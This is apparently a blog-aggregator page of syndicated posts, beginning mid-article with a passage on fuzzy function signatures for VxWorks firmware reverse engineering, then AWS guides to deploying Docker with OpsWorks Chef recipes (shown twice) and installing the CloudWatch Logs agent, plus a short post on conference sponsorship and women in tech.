A simple way to identify these similar, but not identical, functions in an architecture independent manner is to generate “fuzzy” signatures based only on easily identifiable actions, such as memory accesses, references to constant values, and function calls.
In the above function for example, we can see that there are six code blocks, one which references the immediate value 0xFFFFFFFF, one which has a single function call, and one which contains two function calls. As long as no other functions match this “fuzzy” signature, we can use these unique metrics to identify this same function in other IDBs. Although this type of matching can catch functions that would otherwise go unidentified, it also has a higher propensity for false positives.
A bit more reliable metric is unique string references, such as this one in gethostbyname:
gethostbyname string xrefgethostbyname string xref
Likewise, unique constants can also be used for function identification, particularly subroutines related to crypto or hashing:
Constant 0x41C64E6D used by randConstant 0x41C64E6D used by rand
Even identifying functions whose names we don’t know can be useful. Consider the following code snippet in sub_801A50E0, from the VxWorks 5.5 firmware:
Function calls from sub_801A50E0Function calls from sub_801A50E0
This unidentified function calls memset, strcpy, atoi, and sprintf; hence, if we can find this same function in other VxWorks firmware, we can identify these standard functions by association.
Alternative Signatures in Practice
I wrote an IDA plugin to automate these signature techniques and apply them to the VxWorks 5.5.1 firmware:
Output from the Rizzo pluginOutput from the Rizzo plugin
This identified nearly 1,300 functions, and although some of those are probably incorrect, it was quite successful in locating many standard POSIX functions:
Functions identified by RizzoFunctions identified by Rizzo
Like any such automated process, this is sure to produce some false positives/negatives, but having used it successfully against several RTOS firmwares now, I’m quite happy with it (read: “it works for me”!).

Running Docker on AWS OpsWorks

Post Syndicated from Chris Barclay original http://blogs.aws.amazon.com/application-management/post/Tx2FPK7NJS5AQC5/Running-Docker-on-AWS-OpsWorks

AWS OpsWorks lets you deploy and manage application of all shapes and sizes. OpsWorks layers let you create blueprints for EC2 instances to install and configure any software that you want. This blog will show you how to create a custom layer for Docker. For an overview of Docker, see https://www.docker.com/tryit. Docker lets you precisely define the runtime environment for your application and deploy your application code and its runtime as a Docker container. You can use Docker containers to support new languages like Go or to incorporate your dev and test workflows seamlessly with AWS OpsWorks.

 

The Docker layer uses Chef recipes to install Docker and deploy containers to the EC2 instances running in that layer. Simply provide a Dockerfile and OpsWorks will automatically run the recipes to build and run the container. A stack can have multiple Docker layers and you can deploy multiple Docker containers to each layer. You can extend or change the Chef example recipes to use Docker in the way that works best for you. If you aren’t familiar with Chef recipes, see Cookbooks 101 for an introduction.

 

Step 1: Create Recipes

First, create a repository to store your Chef recipes. OpsWorks supports Git and Subversion, or you can store an archive bundle on Amazon S3. The structure of a cookbook repository is described in the OpsWorks documentation.

 

The docker::install recipe installs the necessary Docker software on your instances:

 

case node[:platform]
when "ubuntu","debian"
package "docker.io" do
action :install
end
when ‘centos’,’redhat’,’fedora’,’amazon’
package "docker" do
action :install
end
end

service "docker" do
action :start
end

The docker::docker-deploy recipe deploys your docker containers (specified by a Dockerfile):

include_recipe ‘deploy’

node[:deploy].each do |application, deploy|

if node[:opsworks][:instance][:layers].first != deploy[:environment_variables][:layer]
Chef::Log.debug("Skipping deploy::docker application #{application} as it is not deployed to this layer")
next
end

opsworks_deploy_dir do
user deploy[:user]
group deploy[:group]
path deploy[:deploy_to]
end

opsworks_deploy do
deploy_data deploy
app application
end

bash "docker-cleanup" do
user "root"
code <<-EOH
if docker ps | grep #{deploy[:application]};
then
docker stop #{deploy[:application]}
sleep 3
docker rm #{deploy[:application]}
sleep 3
fi
if docker images | grep #{deploy[:application]};
then
docker rmi #{deploy[:application]}
fi
EOH
end

bash "docker-build" do
user "root"
cwd "#{deploy[:deploy_to]}/current"
code <<-EOH
docker build -t=#{deploy[:application]} . > #{deploy[:application]}-docker.out
EOH
end

dockerenvs = " "
deploy[:environment_variables].each do |key, value|
dockerenvs=dockerenvs+" -e "+key+"="+value
end

bash "docker-run" do
user "root"
cwd "#{deploy[:deploy_to]}/current"
code <<-EOH
docker run #{dockerenvs} -p #{node[:opsworks][:instance][:private_ip]}:#{deploy[:environment_variables][:service_port]}:#{deploy[:environment_variables][:container_port]} –name #{deploy[:application]} -d #{deploy[:application]}
EOH
end

end

Then create a repository to store your Dockerfile. Here’s a sample Dockerfile to get you going:

FROM ubuntu:12.04

RUN apt-get update
RUN apt-get install -y nginx zip curl

RUN echo "daemon off;" >> /etc/nginx/nginx.conf
RUN curl -o /usr/share/nginx/www/master.zip -L https://codeload.github.com/gabrielecirulli/2048/zip/master
RUN cd /usr/share/nginx/www/ && unzip master.zip && mv 2048-master/* . && rm -rf 2048-master master.zip

EXPOSE 80

CMD ["/usr/sbin/nginx", "-c", "/etc/nginx/nginx.conf"]

Step 2: Create an OpsWorks Stack

Now you’re ready to use these recipes with OpsWorks. Open the OpsWorks console

Select Add a Stack to create an OpsWorks stack.

Give it a name and select Advanced.

Set Use custom Chef Cookbooks to Yes.

Set Repository type to Git.

Set the Repository URL to the repository where you stored the recipes created in the previous step.

Click the Add Stack button at the bottom of the page to create the stack.

Step 3: Add a Layer

Select Add Layer. 

Choose Custom Layer, set the name to “Docker”, shortname to “docker”, and click Add Layer. 

Click the layer’s edit Recipes action and scroll to the Custom Chef recipes section. You will notice there are several headings—Setup, Configure, Deploy, Undeploy, and Shutdown—which correspond to OpsWorks lifecycle events. OpsWorks triggers these events at these key points in instance’s lifecycle, which runs the associated recipes. 

Enter docker::install in the Setup box and click + to add it to the list

Enter docker::docker-deploy in the Deploy box and click + to add it to the list

Click the Save button at the bottom to save the updated configuration. 

Step 4: Add an Instance

The Layer page should now show the Docker layer. However, the layer just controls how to configure instances. You now need to add some instances to the layer. Click Instances in the navigation pane and under the Docker layer, click + Instance. For this walkthrough, just accept the default settings and click Add Instance to add the instance to the layer. Click start in the row’s Actions column to start the instance. OpsWorks will then launch a new EC2 instance and run the Setup recipes to configure Docker. The instance’s status will change to online when it’s ready.

 

Step 5: Add an App & Deploy

Once you’ve started your instances:

In the navigation pane, click Apps and on the Apps page, click Add an app.

On the App page, give it a Name.

Set app’s type to other.

Specify the app’s repository type. 

Specify the app’s repository URL. This is where your Dockerfile lives and is usually a separate repository from the cookbook repository specified in step 2.

Set the following environment variables:

container_port – Set this variable to the port specified by the EXPOSE parameter in your Dockerfile.

service_port – Set this variable to the port your container will expose on the instance to the outside world. Note: Be sure that your security groups allow inbound traffic for the port specified in service_port.

layer – Set this variable to the shortname of the layer that you want this container deployed to (from Step 3). This lets you have multiple docker layers with different apps deployed on each, such as a front-end web app and a back-end worker. 

For our example, set container_port=80, service_port=80, and layer=docker. You can also define additional environment variables that are automatically passed onto your Docker container, for example a database endpoint that your app connects with. 

Keep the default values for the remaining settings and click Add App. 

To install the code on the server, you must deploy the app. It will take some time for your instances to boot up completely. Once they show up as “online” in the Instances view, navigate to Apps and click deploy in the Actions column. If you create multiple docker layers, note that although the deployment defaults to all instances in the stack, the containers will only be deployed to the layer specified in the layer environment variable.

Once the deployment is complete, you can see your app by clicking the public IP address of the server. You can update your Dockerfile and redeploy at any time.

Step 6: Making attributes dynamic

The recipes written for this blog pass environment variables into the Docker container when it is started. If you need to update the configuration while the app is running, such as a database password, solutions like etcd can make attributes dynamic. An etcd server can run on each instance and be populated by the instance’s OpsWorks attributes. You can update OpsWorks attributes, and thereby the values stored in etcd, at any time, and those values are immediately available to apps running in Docker containers. A future blog post will cover how to create recipes to install etcd and pass OpsWorks attributes, including app environment variables, to the Docker containers.

 

Summary

These instructions have demonstrated how use AWS OpsWorks and Docker to deploy applications, represented by Dockerfiles. You can also use Docker layers with other AWS OpsWorks features, including automatic instance scaling and integration with Elastic Load Balancing and Amazon RDS. 

 

Running Docker on AWS OpsWorks

Post Syndicated from Chris Barclay original http://blogs.aws.amazon.com/application-management/post/Tx2FPK7NJS5AQC5/Running-Docker-on-AWS-OpsWorks

AWS OpsWorks lets you deploy and manage application of all shapes and sizes. OpsWorks layers let you create blueprints for EC2 instances to install and configure any software that you want. This blog will show you how to create a custom layer for Docker. For an overview of Docker, see https://www.docker.com/tryit. Docker lets you precisely define the runtime environment for your application and deploy your application code and its runtime as a Docker container. You can use Docker containers to support new languages like Go or to incorporate your dev and test workflows seamlessly with AWS OpsWorks.

 

The Docker layer uses Chef recipes to install Docker and deploy containers to the EC2 instances running in that layer. Simply provide a Dockerfile and OpsWorks will automatically run the recipes to build and run the container. A stack can have multiple Docker layers and you can deploy multiple Docker containers to each layer. You can extend or change the Chef example recipes to use Docker in the way that works best for you. If you aren’t familiar with Chef recipes, see Cookbooks 101 for an introduction.

 

Step 1: Create Recipes

First, create a repository to store your Chef recipes. OpsWorks supports Git and Subversion, or you can store an archive bundle on Amazon S3. The structure of a cookbook repository is described in the OpsWorks documentation.

 

The docker::install recipe installs the necessary Docker software on your instances:

 

case node[:platform]
when "ubuntu","debian"
package "docker.io" do
action :install
end
when ‘centos’,’redhat’,’fedora’,’amazon’
package "docker" do
action :install
end
end

service "docker" do
action :start
end

The docker::docker-deploy recipe deploys your docker containers (specified by a Dockerfile):

include_recipe ‘deploy’

node[:deploy].each do |application, deploy|

if node[:opsworks][:instance][:layers].first != deploy[:environment_variables][:layer]
Chef::Log.debug("Skipping deploy::docker application #{application} as it is not deployed to this layer")
next
end

opsworks_deploy_dir do
user deploy[:user]
group deploy[:group]
path deploy[:deploy_to]
end

opsworks_deploy do
deploy_data deploy
app application
end

bash "docker-cleanup" do
user "root"
code <<-EOH
if docker ps | grep #{deploy[:application]};
then
docker stop #{deploy[:application]}
sleep 3
docker rm #{deploy[:application]}
sleep 3
fi
if docker images | grep #{deploy[:application]};
then
docker rmi #{deploy[:application]}
fi
EOH
end

bash "docker-build" do
user "root"
cwd "#{deploy[:deploy_to]}/current"
code <<-EOH
docker build -t=#{deploy[:application]} . > #{deploy[:application]}-docker.out
EOH
end

dockerenvs = " "
deploy[:environment_variables].each do |key, value|
dockerenvs=dockerenvs+" -e "+key+"="+value
end

bash "docker-run" do
user "root"
cwd "#{deploy[:deploy_to]}/current"
code <<-EOH
docker run #{dockerenvs} -p #{node[:opsworks][:instance][:private_ip]}:#{deploy[:environment_variables][:service_port]}:#{deploy[:environment_variables][:container_port]} –name #{deploy[:application]} -d #{deploy[:application]}
EOH
end

end

Then create a repository to store your Dockerfile. Here’s a sample Dockerfile to get you going:

FROM ubuntu:12.04

RUN apt-get update
RUN apt-get install -y nginx zip curl

RUN echo "daemon off;" >> /etc/nginx/nginx.conf
RUN curl -o /usr/share/nginx/www/master.zip -L https://codeload.github.com/gabrielecirulli/2048/zip/master
RUN cd /usr/share/nginx/www/ && unzip master.zip && mv 2048-master/* . && rm -rf 2048-master master.zip

EXPOSE 80

CMD ["/usr/sbin/nginx", "-c", "/etc/nginx/nginx.conf"]

Step 2: Create an OpsWorks Stack

Now you’re ready to use these recipes with OpsWorks. Open the OpsWorks console

Select Add a Stack to create an OpsWorks stack.

Give it a name and select Advanced.

Set Use custom Chef Cookbooks to Yes.

Set Repository type to Git.

Set the Repository URL to the repository where you stored the recipes created in the previous step.

Click the Add Stack button at the bottom of the page to create the stack.

Step 3: Add a Layer

Select Add Layer. 

Choose Custom Layer, set the name to “Docker”, shortname to “docker”, and click Add Layer. 

Click the layer’s edit Recipes action and scroll to the Custom Chef recipes section. You will notice there are several headings—Setup, Configure, Deploy, Undeploy, and Shutdown—which correspond to OpsWorks lifecycle events. OpsWorks triggers these events at these key points in instance’s lifecycle, which runs the associated recipes. 

Enter docker::install in the Setup box and click + to add it to the list

Enter docker::docker-deploy in the Deploy box and click + to add it to the list

Click the Save button at the bottom to save the updated configuration. 

Step 4: Add an Instance

The Layer page should now show the Docker layer. However, the layer just controls how to configure instances. You now need to add some instances to the layer. Click Instances in the navigation pane and under the Docker layer, click + Instance. For this walkthrough, just accept the default settings and click Add Instance to add the instance to the layer. Click start in the row’s Actions column to start the instance. OpsWorks will then launch a new EC2 instance and run the Setup recipes to configure Docker. The instance’s status will change to online when it’s ready.

 

Step 5: Add an App & Deploy

Once you’ve started your instances:

In the navigation pane, click Apps and on the Apps page, click Add an app.

On the App page, give it a Name.

Set app’s type to other.

Specify the app’s repository type. 

Specify the app’s repository URL. This is where your Dockerfile lives and is usually a separate repository from the cookbook repository specified in step 2.

Set the following environment variables:

container_port – Set this variable to the port specified by the EXPOSE parameter in your Dockerfile.

service_port – Set this variable to the port your container will expose on the instance to the outside world. Note: Be sure that your security groups allow inbound traffic for the port specified in service_port.

layer – Set this variable to the shortname of the layer that you want this container deployed to (from Step 3). This lets you have multiple docker layers with different apps deployed on each, such as a front-end web app and a back-end worker. 

For our example, set container_port=80, service_port=80, and layer=docker. You can also define additional environment variables that are automatically passed onto your Docker container, for example a database endpoint that your app connects with. 

Keep the default values for the remaining settings and click Add App. 

To install the code on the server, you must deploy the app. It will take some time for your instances to boot up completely. Once they show up as “online” in the Instances view, navigate to Apps and click deploy in the Actions column. If you create multiple docker layers, note that although the deployment defaults to all instances in the stack, the containers will only be deployed to the layer specified in the layer environment variable.

Once the deployment is complete, you can see your app by clicking the public IP address of the server. You can update your Dockerfile and redeploy at any time.

Step 6: Making attributes dynamic

The recipes written for this blog pass environment variables into the Docker container when it is started. If you need to update the configuration while the app is running, such as a database password, solutions like etcd can make attributes dynamic. An etcd server can run on each instance and be populated by the instance’s OpsWorks attributes. You can update OpsWorks attributes, and thereby the values stored in etcd, at any time, and those values are immediately available to apps running in Docker containers. A future blog post will cover how to create recipes to install etcd and pass OpsWorks attributes, including app environment variables, to the Docker containers.

 

Summary

These instructions have demonstrated how use AWS OpsWorks and Docker to deploy applications, represented by Dockerfiles. You can also use Docker layers with other AWS OpsWorks features, including automatic instance scaling and integration with Elastic Load Balancing and Amazon RDS. 

 

Always Follow the Money

Post Syndicated from Bradley M. Kuhn original http://ebb.org/bkuhn/blog/2014/10/10/anita-borg.html

Selena Larson wrote an article
describing the Male Allies Plenary Panel at the Anita Borg
Institute’s Grace Hopper Celebration on Wednesday night
. There is a
video available of the
panel
(that’s the youtube link, the links on Anita Borg Institute’s
website don’t work with Free Software).

Selena’s article pretty much covers it. The only point that I thought
useful to add was that one can “follow the money” here.
Interestingly
enough, Facebook,
Google, GoDaddy, and Intuit were all listed as top-tier sponsors of the event
.
I find it a strange correlation that not one man on this panel is from a
company that didn’t sponsor the event. Are there no male allies
to the cause of women in tech worth hearing from who work for companies that, say,
don’t have enough money to sponsor the event? Perhaps that’s true, but
it’s somewhat surprising.

Honest US Congresspeople often say that the main problem with corruption
of campaign funds is that those who donate simply have more access and time
to make their case to the congressional representatives. They aren’t
buying votes; they’re buying access for conversations. (This was covered
well
in This
American Life, Episode 461
).

I often see a similar problem in the “Open Source” world. The
loudest microphones can be bought by the highest bidder (in various ways),
so we hear more from the wealthiest companies. The amazing thing about
this story, frankly, is that buying the microphone didn’t work
this time. I’m very glad the audience refused to let it happen! I’d love
to see a similar reaction at the corporate-controlled “Open Source and
Linux” conferences!

Update later in the day: The conference I’m commenting on
above is the same conference where Satya Nadella, CEO of Microsoft, said
that women shouldn’t ask for raises, and Microsoft is also a
top-tier sponsor of the conference. I’m left wondering if anyone who spoke
at this conference didn’t pay for the privilege of making these gaffes.

Getting Started with CloudWatch Logs

Post Syndicated from Henry Hahn original http://blogs.aws.amazon.com/application-management/post/Tx214L3IEKAQAJA/Getting-Started-with-CloudWatch-Logs

Amazon CloudWatch Logs lets you monitor your applications and systems for operational issues in near real-time using your existing log files.  You can get started in just minutes using the Amazon CloudWatch Logs agent for Amazon Linux, CentOs, Redhat Linux and Ubuntu.

In this blog post, we’ll show you how easy it is to get started by walking through the installation process on Linux-based systems.  Cloudwatch Logs is also supported on Windows Server, which we’ll cover in another post (for more information, see Configuring a Windows Instance Using the EC2Config Service.)

Step 1: Permissions

CloudWatch uses the Identity and Access Management (IAM) service for authentication and authorization. In this blog post, we’re using a feature of IAM called IAM Roles for EC2, which lets us associate specific permissions with an Amazon EC2 instance when you launch it.

In this case, we have an instance we launched with the permissions for the IAM role for all logs actions with the following policy (to learn more about adding a policy to an existing IAM role, see IAM Users and Groups and Managing IAM Policies in Using IAM:)

{

  "Version": "2012-10-17",

  "Statement": [

    {

      "Effect": "Allow",

      "Action": [

        "logs:*"

      ],

      "Resource": [

        "arn:aws:logs:*:*:*"

      ]

    }

  ]

}

Step 2: Agent Installation & Configuration

With the right permissions set, we can connect to our EC2 instance with an SSH client and run the CloudWatch Logs Agent interactive setup. For more information about how to connect to your EC2 instance, see Connect to Your Instance in the Amazon Elastic Compute Cloud User Guide.

First, we’ll retrieve the agent with a simple wget command and then start running the installer.  Note that CloudWatch Logs is is currently available in three regions including us-east-1, us-west-2 and eu-west-1.  In this example, we used the us-east-1 region (this will be where the logs are processed and stored.)

wget https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py
sudo python ./awslogs-agent-setup.py –region us-east-1

The installer will walk you through a set of questions to get you up and running:

Credentials

The CloudWatch Logs agent first asks for credential information. Since we’re using the IAM role associated with our running instance, we can just press “Enter” when prompted for the AWS Access Key and ID (otherwise, we would have provided the keys).

Default Region Name & Output Format

The default region name will show as the region you pass as the region argument to the setup (us-east-1, in our case); we just press “ENTER” to accept.  The default output format determines output of the related CLI commands.  You can also press “ENTER”.

Log File to Send

The installer now asks what log file you would like for the agent to send to CloudWatch for monitoring. By default, the installer suggests /var/log/messages but you can choose any file you like. In this example, we’ll use the default value of /var/log/messages and just press “ENTER”.

Log Group

We’re asked what log group we want the log data to be in. By default, the setup process suggests a log group with the same name as path and file being sent to CloudWatch. Again, we’ll press “ENTER” to accept the default.

Log Stream Name

Next, we need to give this source, or log stream, a name. The installer makes it easy to choose the host name, the instance ID (if running on EC2) or a name of your choosing (custom.) Again, we’ll use the default name derived from the instance ID.

Timestamp

Most log data includes a timestamp. CloudWatch Logs will use the timestamp embedded in each event if you provide the format.  In our case, we chose the default by pressing “ENTER” but you can always provide a custom time stamp (for more info see the CloudWatch Logs Agent reference.)

Initial Upload Position

CloudWatch Logs can begin uploading data from the beginning of a log file or start “tailing” it from the end as new events are added.  If you have existing log data that you want to have sent to CloudWatch, you can choose the first option which will send log data starting at the beginning of the file.  In both options, the agent will continue to monitor the file for any new log events.

After you have completed the CloudWatch Logs agent installation steps, the installer asks if you want to configure another log file. For the sake of this example, we’re just going to monitor /var/log/messages, but you can run the process as many times as you like for each log file. For more information about the settings in the agent configuration file, see CloudWatch Logs Agent Reference. Once the installer is complete, it will start the agent with the new configuration.  You can see what this entire process will look like, below.

Step 3: Access Log Data in CloudWatch Logs

With the agent started, the agent will begin sending log data to CloudWatch. We can now visit the console to see any new data that is showing up at https://console.aws.amazon.com/cloudwatch/home?region=us-east-1#logs. In our case, we can see the newly created log group and log stream in the CloudWatch console after the agent has been running for a few moments:

From here, you can setup metric filters to start monitoring for events you’re interested in.  For more information on setting up metric filters, see the Creating Metric Filters documentation.

Related Resources

Of course, the CloudWatch Logs Agent can also be deployed with other technologies such as CloudFormation, Elastic Beanstalk and AWS OpsWorks.  You can find related blog posts on these topics, below.

Using Amazon CloudWatch Logs with AWS Elastic Beanstalk

View CloudFormation Logs in the Console

Using Amazon CloudWatch Logs with AWS OpsWorks

 

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close